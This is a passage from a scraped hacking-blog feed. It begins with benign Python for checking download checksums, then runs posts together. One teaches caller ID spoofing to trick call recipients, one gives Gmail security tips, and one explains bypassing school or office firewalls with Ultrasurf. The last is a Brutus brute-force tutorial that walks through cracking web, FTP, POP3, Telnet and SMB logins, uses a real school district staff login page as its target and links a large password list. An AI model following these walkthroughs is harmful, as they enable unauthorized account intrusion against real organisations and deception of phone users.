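        # Refuse path components so a manifest cannot point outside the folder.
        if not name or name in (".", "..") or name != os.path.basename(name):
            raise ValueError("unsafe file name in manifest: %r" % name)
        entries[name] = digest.lower()
    return entries


def verify_downloads(directory, manifest_text):
    """Return {name: 'OK' | 'MISMATCH' | 'MISSING'} for every manifest entry."""
    results = {}
    for name, expected in parse_manifest(manifest_text).items():
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            results[name] = "MISSING"
        elif hmac.compare_digest(file_digest(path), expected):
            results[name] = "OK"
        else:
            results[name] = "MISMATCH"
    return results


def demo():
    """Build constructed downloads in a temp folder and verify them."""
    manifest = "\n".join([
        SAMPLE_MD5 + "  backup.tar",      # text-mode marker (two spaces)
        SAMPLE_MD5 + "  flipped.tar",
        SAMPLE_MD5 + " *truncated.tar",   # binary-mode marker (space + '*')
        SAMPLE_MD5 + "  missing.tar",
    ])
    downloads = {
        "backup.tar": SAMPLE,                               # intact download
        "flipped.tar": SAMPLE.replace(b"lazy", b"lazz"),    # same size, one byte changed
        "truncated.tar": SAMPLE[:-10],                      # connection dropped early
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, data in downloads.items():
            with open(os.path.join(tmp, name), "wb") as fh:
                fh.write(data)
        return verify_downloads(tmp, manifest)


if __name__ == "__main__":
    for name, status in demo().items():
        print("%-14s %s" % (name, status))
```

The `flipped.tar` case shows why comparing file sizes is not enough: the size is identical and only the hash reveals the change.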
Cheers!Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com0tag:blogger.com,1999:blog-289744729559414161.post-36081988396856340932010-12-21T05:34:00.000-08:002011-06-27T20:13:52.753-07:00Caller ID SpoofingCaller ID spoofing is the act of making the telephone network display any desired (fake) number on the recipient’s Caller ID display unit instead of the original number. Caller ID spoofing can make a call appear to have come from any phone number that the caller wishes. <br />Have you ever wondered how to perform Caller ID spoofing? Read on to know more information on Caller ID spoofing and find out how it is performed.<br />Unlike what most people think, an incoming call may not be from the number that is displayed on the Caller ID display unit. Because of the high trust that people have in the Caller ID system, it is possible for the caller to easily fool them and make them believe that the number displayed on the Caller ID display is real. This is all possible through Caller ID spoofing.<br /><div></div><h2>How to Spoof Caller ID?</h2><div></div>You can easily spoof any Caller ID using services like <a href="http://www.gohacking.com/recom_products/SpoofCard.php" rel="nofollow" target="_blank">SpoofCard</a>. In order to use the SpoofCard service, you need to pay in advance and obtain a PIN (Personal Identification Number) which grants access to make a call using the Caller ID spoofing service. Once you have purchased the service, you will be given access to log in to your SpoofCard account. To begin with, you need to call the number given by SpoofCard and enter the PIN. Now you will be given access to enter the number you wish to call and the number you wish to appear as the Caller ID. Once you select the options and initiate the calling process, the call is bridged and the person on the other end receives your call. 
The receiver would normally assume that the call was coming from a different phone number, i.e. the spoofed number chosen by you, thus tricking the receiver into thinking that the call was coming from a different individual or organization than the caller’s. In this way it is just a cakewalk to spoof Caller ID and trick the receiver on the other end. Thus you neither need to be a computer expert nor have any technical knowledge to perform Caller ID spoofing. For more information on SpoofCard service visit the following link.<br /><div></div><div style="font-size: 18px;"><a href="http://www.gohacking.com/recom_products/SpoofCard.php" rel="nofollow" target="_blank">SpoofCard</a></div><br /> <br /><h2>How Caller ID Spoofing works?</h2><div></div>Caller ID spoofing is done through various methods and using different technologies. The most commonly used technologies to spoof Caller ID are <a href="http://en.wikipedia.org/wiki/Voice_over_Internet_Protocol" target="_blank">VOIP</a> (Voice Over IP) and <a href="http://en.wikipedia.org/wiki/Primary_rate_interface" target="_blank">PRI</a> (Primary Rate Interface) lines.<br />Today most VOIP systems provide an option for their users to enter whatever number they want in the calling party field, and this number is sent out when they make a call. Hence it is easily possible for any user to spoof Caller ID provided they have a VOIP system and know how to properly configure it to spoof the Caller ID. However sites like <a href="http://www.gohacking.com/recom_products/SpoofCard.php" rel="nofollow" target="_blank">SpoofCard</a> provide an easy and cheap spoofing service for those who aren’t using VOIP systems that they can configure themselves.<br />Caller ID spoofing is possible and has been performed right from the days the Caller ID system was introduced. However most people are unaware of the fact that it is possible to spoof Caller ID and make any number be displayed on the receiver’s end. 
In the past, Caller ID spoofing service was mostly used by telemarketers, collection agencies, law-enforcement officials, and private investigators but today it is available to any Internet user who wishes to perform Caller ID spoofing.Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com0tag:blogger.com,1999:blog-289744729559414161.post-6703792710823327032010-12-21T05:24:00.000-08:002011-06-27T20:13:52.753-07:00Best 7 Ways to Protect Your Gmail AccountEmail is the most invaluable asset of anyone’s identity on the web. You use email every day and have all the important information stored in your inbox. All your social networking accounts, website registrations, Paypal accounts etc. are connected to and controlled by your email, and thus it makes sense to completely secure your Gmail account and prevent unauthorized access.<br />Choosing a strong password is not enough; you should be well aware of how people try to gain access to other people’s email accounts by unfair means. Here are some useful tips on securing your Gmail account and avoiding getting hacked:<br /><br /><h3>1. Always Check The URL before Logging in to Gmail</h3>Whenever you log in to your Gmail account, always check the URL in the browser address bar. This is because there are plenty of dirty minds who create an exact replica of the Gmail login page. The worst part – they install some scripts or malicious code behind the fake login page and host the page on their web server. 
When you log in to Gmail from a fake login page, your username as well as password is sent to another email address or to an FTP location.<br /><img alt="Check for Fake Login Pages of Gmail" class="aligncenter size-full wp-image-15886" height="345" src="http://images.maketecheasier.com/2010/05/gmail-fake-login-pages.png" style="display: block;" title="Check for Fake Login Pages of Gmail" width="535" /><br />Hence, always check that you are logging in to Gmail by typing www.gmail.com and not from any other URL.<br /><h3>2. Avoid checking Emails at Public Places</h3>A Keylogger is a computer program which can be used to record what you are typing on the keyboard. The Keylogger records your keystrokes, saves them in a simple text file and sends it to an email address or to an FTP server. And you are completely unaware of the whole process, which runs in the background.<br /><img alt="Keylogger programs used to record keystrokes from keyboard" class="aligncenter size-full wp-image-15888" height="272" src="http://images.maketecheasier.com/2010/05/gmail-keyloggers.jpg" style="display: block;" title="keyloggers" width="400" /><br />You never know which programs are installed on a public computer. Consider a simple scenario: You went to a local internet cafe to check emails from your Gmail account. The cafe staff has installed a Keylogger on every computer and when you type the username and password, the Keylogger script comes into action, records both your username and password and sends them to another email address. You leave the cafe after checking emails and the cafe staff retrieves your username and password and hacks your account.<br />Hence, never check emails at a local cafe or at public places or on any computer you don’t control.<br /><h3>3. Forward Emails to A Secondary Email account</h3>What if you need to check emails from a public computer or a local internet cafe and you fear that the computer might have some keylogger programs installed? 
Here is a nice workaround.<br /><ul><li>Create another Gmail account and choose a different password for this account. This means that the password of your new Gmail account should not match with the password of your main Gmail account.</li><li>Log in to your main Gmail account, click “Settings” and go to the “Forwarding and POP/IMAP” tab.</li><li>Select the option to forward all incoming mails to your newly created Gmail account. Any email received in your primary email account will be forwarded to this secondary email address automatically.</li></ul><img alt="gmail-forward-emails" class="aligncenter size-full wp-image-15889" height="306" src="http://images.maketecheasier.com/2010/05/gmail-forward-emails.png" style="display: block;" title="Forward Emails to a New Gmail account" width="541" /><br />Whenever you want to check emails from a public computer, use this secondary email account. Anybody trying to hack your email account using a keylogger or a malicious program can hack this secondary email account but not your primary one. Obviously, do not leave any important emails or password/username in this temporary email account – keep deleting emails at regular intervals. Yes, this may sound ridiculous but it’s better to be on the safe side.<br /><b>VERY IMPORTANT:</b> Do not use or associate this secondary email account as a password recovery option of your primary email account. Use this email account just for checking emails at a public computer, that’s it.<br /><h3>4. Regularly Monitor Gmail Account Activity</h3>You can monitor the IP addresses of the computers used to log in to your Gmail account. 
To find the IP addresses, log in to Gmail, scroll down and click the account activity details link as shown below:<br /><img alt="Gmail account activity details" class="aligncenter size-full wp-image-15892" height="544" src="http://images.maketecheasier.com/2010/05/gmail-account-activity.png" style="display: block;" title="Gmail account activity" width="560" /><br />This will show you a list of the last IP addresses used to log in to your Gmail account. You will notice the country and state name alongside the date and time of your last Gmail activity. Should you find an unknown IP address or the name of an unfamiliar place, there is a high chance that somebody else is logging in to your Gmail account from elsewhere.<br />To solve this issue, click the “Sign out of all other sessions” button and Gmail will automatically delete all the active sessions of your account. Next, immediately change the password from your Google accounts settings page.<br /><h3>5. Check for Bad Filters</h3>Gmail filters can be used to set rules in your Gmail account – you can automatically forward specific emails to another email account, delete them, archive them and do various other tasks. Sadly, filters can be a big threat to your Gmail account security.<br />Consider a situation – you checked emails from your college computer, forgot to log out and left the classroom. One of your friends found that you had forgotten to log out and he applied a filter in your Gmail account. 
This filter automatically forwards all of your emails to his email address.<br />Now he has access to all your emails and he may reset your account password, if he wants.<br />Hence you should always check for unknown filters from <b>Gmail Settings -> Filters</b>. Delete any filter which you didn’t create or which appears suspicious.<br /><img alt="Check for unknown Gmail filters" class="aligncenter size-full wp-image-15895" height="227" src="http://images.maketecheasier.com/2010/05/gmail-filters.png" style="display: block;" title="Check for unknown Gmail filters" width="520" /><br /><h3>6. Do not Click on Suspicious Links</h3>There are some websites which let anyone send fake emails to any email address. And the worst part is that the sender can customize the “From” address to anything – noreply@gmail.com or gmailteam@google.com.<br />Consider a scenario: Mr X uses some website and sends an email to you asking you to change your Gmail password due to security reasons. You see the from address field as something like “support@gmail.com” and think that it’s from Gmail. No, it’s not.<br />When you receive any email which asks you to change your account password or enter login credentials, STOP. Do not ever click on any suspicious links from your inbox.<br /><img alt="Suspicious links in Gmail account" class="aligncenter size-full wp-image-15897" height="373" src="http://images.maketecheasier.com/2010/05/gmail-suspicious-links.png" style="display: block;" title="Suspicious Links in Gmail account" width="550" /><br /><b>Note</b>: <i>Gmail will never ask you to change your password or enter login credentials without any reason. Hence, if you receive any email which claims to be from Google and wants you to change your password, rest assured someone is trying to fool you and hack your email account.</i><br /><h3>7. Choose a Strong Alphanumeric password</h3>Most users choose very generic passwords which can be easily guessed. 
You should always choose a very strong password which is difficult to guess. Always remember the following tips regarding choosing passwords:<br /><ul><li>Use both numbers and letters in your password. It would be even better if you include symbols and special characters.</li><li>Never use your phone number, parents’ names or credit card number as your email account password.</li><li>Choose a long password – probably more than 10 characters.</li><li>Never write your password on paper or save it as a text document on your computer.</li></ul>Anyone trying to hack your email account will have a difficult time guessing the password, and the more complicated your password, the more secure it is. You should also <a href="http://maketecheasier.com/recover-google-password-via-sms/2009/12/04">connect your mobile number with your Gmail account</a>. This is required in case you forget the password and can’t log in to Gmail.Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com1tag:blogger.com,1999:blog-289744729559414161.post-53611157715279851212010-11-05T23:01:00.000-07:002011-06-27T20:13:52.754-07:00How To Bypass Firewall Using Tool<h3 class="post-title entry-title"> </h3><div class="post-header"> </div><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;">Are Orkut, Facebook or Yahoo blocked at your school, college or office? Then don't worry. I have a solution for you that will not only unblock all the websites that have been blocked but also make your internet surfing anonymous so that nobody can trace your original IP address. As you know, most proxy websites are blocked by your school, college or office firewall, and even if you find some new proxies they block them too. 
So why not move to something that is almost a permanent solution?<br /><br />We will be using a very small and free piece of software called Ultrasurf. It will not only allow you to surf blocked websites but will also give you the freedom to stream videos and to download and upload files.<br /><br /><span style="font-weight: bold;">Here is the step by step tutorial with screenshots:</span><br /><br />1. 
First you need to</span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"> </span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><a href="http://www.ultrareach.com/" style="color: #a91b33; text-decoration: none;"><span style="font-weight: bold;">Download Ultrasurf</span></a></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;">.</span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;">2. You will get a zipped file with a .exe file in it. Click on it</span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;">3. 
It will start Ultrasurf and automatically connect to its server.<br /><br /><a href="http://2.bp.blogspot.com/_F7GuXCzPQdY/TM90k72NuGI/AAAAAAAAE4Y/Lel5AlcH8tY/s1600/0427011.jpg" style="color: #a91b33; text-decoration: none;"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5534770644950825058" src="http://2.bp.blogspot.com/_F7GuXCzPQdY/TM90k72NuGI/AAAAAAAAE4Y/Lel5AlcH8tY/s400/0427011.jpg" style="border-width: 0px; cursor: pointer; display: block; height: 268px; margin: 0px auto 10px; padding: 10px; text-align: center; width: 380px;" /></a><br />4. It will even open Internet Explorer automatically. Now you have unblocked and secure access to the internet.<br /><br />5. 
If you want to use Ultrasurf in Firefox, you need to download the Firefox plugin too: <a href="http://www.ultrareach.com/download_en.htm" style="color: #a91b33; text-decoration: none;"><span style="font-weight: bold;">download here</span></a><br /><br />If you are connected to the internet through a proxy server then Ultrasurf will detect it. 
If somehow it does not detect the proxy server then you can manually enter your proxy server</span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;">To manually enter proxy server</span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;">Click on</span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"> </span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><span style="font-weight: bold;">Option > Proxy Setting > Manual Proxy Settings</span></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><a href="http://1.bp.blogspot.com/_F7GuXCzPQdY/TM91RlWtM_I/AAAAAAAAE4g/yoFpbq-2LKo/s1600/0427012.jpg" style="color: #a91b33; text-decoration: none;"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5534771412007203826" 
src="http://1.bp.blogspot.com/_F7GuXCzPQdY/TM91RlWtM_I/AAAAAAAAE4g/yoFpbq-2LKo/s400/0427012.jpg" style="border-width: 0px; cursor: pointer; display: block; height: 326px; margin: 0px auto 10px; padding: 10px; text-align: center; width: 291px;" /></a></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><a href="http://3.bp.blogspot.com/_F7GuXCzPQdY/TM91aqrrgtI/AAAAAAAAE4o/N-DQlEmyjOU/s1600/0427013.jpg" style="color: #a91b33; text-decoration: none;"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5534771568056173266" src="http://3.bp.blogspot.com/_F7GuXCzPQdY/TM91aqrrgtI/AAAAAAAAE4o/N-DQlEmyjOU/s400/0427013.jpg" style="border-width: 0px; cursor: pointer; display: block; height: 281px; margin: 0px auto 10px; padding: 10px; text-align: center; width: 269px;" /></a></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><br /></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"><span style="font-weight: bold;">Note:</span></span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;"> </span><span class="Apple-style-span" style="color: #333333; font-family: Arial,Tahoma,Verdana; font-size: 12px; line-height: 19px;">If you want to use ultrasurf with other applications you need to configure them to use ultrasurf as their proxy client. 
The proxy IP address is 127.0.0.1 and the port is 9666.</span>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com0tag:blogger.com,1999:blog-289744729559414161.post-17111435063932013192010-10-02T19:36:00.000-07:002011-06-27T20:13:52.754-07:00Learn Brutus Tutorial<h3 class="post-title entry-title"> <a href="http://hackguide4u.blogspot.com/2010/10/brutus-tutorial-on-how-to-use-it.html"><br /></a> </h3><div class="post-header"> </div><a href="http://f.imagehost.org/0989/2_9.jpg" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="146" src="http://f.imagehost.org/0989/2_9.jpg" width="200" /></a><b>How to use Brute Force Attack<br /><br />Written by: ALEX<br />================================================== ========<br />I, The alex, take no responsibility for what you do with the information<br />that I am providing for you. 
This information is for educational purposes only.<br />================================================== ========<br /><br />Chapter 1: Introduction to Brutus.<br /><br />1.What is Brutus?<br /><br />2.What can I do with it?<br /><br />3 Where can I download Brutus?<br /><br />4.Where can I find a good password list?<br /><br /><br />Chapter Two: Let's Get Crackin'.<br /><br />1.HTTP Form.<br /><br />2.FTP.<br /><br />3.POP3<br /><br />4.Telnet.<br /><br />5.SMB (Netbios)<br /><br />6.Netbus<br /><br />7.Custom.<br /><br />Chapter Three: Wrapping up.<br /><br />1.Contact Information.<br />========================================<br />Chapter One.<br /><br />==What is Brutus?==<br /><br />Brutus is a well known password brute forcing program.<br /><br />==What can I do with it?==<br /><br />With Brutus, you can brute force passwords for HTTP, FTP, POP3, Telnet, SMB (Netbios), Netbus, and they also have a<br />"Custom" option so you can specify your own settings.<br /><br />==Where can I download Brutus?==<br />You can find Brutus at it's webpage <a href="http://www.hoobie.net/brutus" target="_blank">www.hoobie.net/brutus</a><br />You can also find it at GluTuk's site <a href="http://www.spartandownloads.2ys.com/" target="_blank">www.spartandownloads.2ys.com</a><br /><br />==Where can I find a good password list to use with Brutus?==<br />Pretty much, the only password list you will ever need<br />and has 4.9 million passwords. 
Here are a link where you can download it.<br /><br />Part 1.<br /><a href="http://area51archives.com/files/pass_list.rar">http://area51archives.com/files/pass_list.rar</a><br /><br />Part 2<br /><a href="http://area51archives.com/files/pass_list.rar">http://area51archives.com/files/pass_list.rar</a><br /><br />================================================== ============<br /><br />Chapter Two: Let's Get Crackin'.<br /><br />Note: You can use a proxy for each cracking method.<br /><br />==HTTP Form==<br /><br />This is the option you would use if you want to crack into a website that has a field for a username and a pass, like<br />this one.<br /><br /><a href="http://www.westbranch.k12.oh.us/staff/controls.asp" target="_blank">http://www.westbranch.k12.oh.us/staff/controls.asp</a><br /><br />I will use this site for the rest ov this section as well.<br /><br />First thing you wanna do is open Brutus, and select http form. Then click the modify sequence button. Once there we put<br />the above link into the Target form field, then click Learn Form Settings<br />From here, you click the field name that is for the username, in this case it is userid, once you have selected it,<br />click the username button that is shown above the cookie information. That tells brutus that that field is for the username.<br />Then you select the password field and click the password button, then click accept. Next, in the HTML Response field you<br />need to fill that in with the response you get when you try to enter a password into your site. In this case the response is<br />"You have entered a wrong Password or username." 
For this target we will put that into the Primary response field Once this<br />is done, we click ok, add the IP into the Target Field and start our crack.<br /><br />==FTP==<br /><br />For cracking an FTP server, the default settings should remain how they are, I usually make sure that the "Try to stay<br />connected for unlimited attempts" box is ticked.Thats up to you, once you have selected your options, enter the IP and<br />being the crack.<br /><br />==POP3==<br /><br />This is pretty much the same as FTP cracking as far as, the default settings should work for you. Once again, I like to<br />use the "Try to stay connected for unlimited attempts" option.<br /><br />==Telnet==<br /><br />Seems as if I'm repeating myself, but once again, the default settings should werk for you.<br /><br />==SMB (Netbios)==<br /><br />If you happen to find yourself a target that has the netbios port open (139) and has sharing enabled, but needs a<br />password, this is what you would use. Once again, default settings should werk.<br /><br />==Netbus==<br /><br />Netbus is a popular trojan that sometimes, you might find a server that needs a password to connect.<br />This option is used for, cracking a password protected Netbus server.<br /><br />==Custom==<br /><br />This is what you would use to set up a crack for anything else that you could think ov.You need to find out what you need<br />to put in each field once you click "Define sequence" Those options will vary from target to target.</b><br /><div style="color: white;"><b><span style="font-size: xx-small;">......................................................................................................................................................... ...............................................................</span></b></div>Hacking Skillshttp://www.blogger.com/profile/13163124608674451144noreply@blogger.com1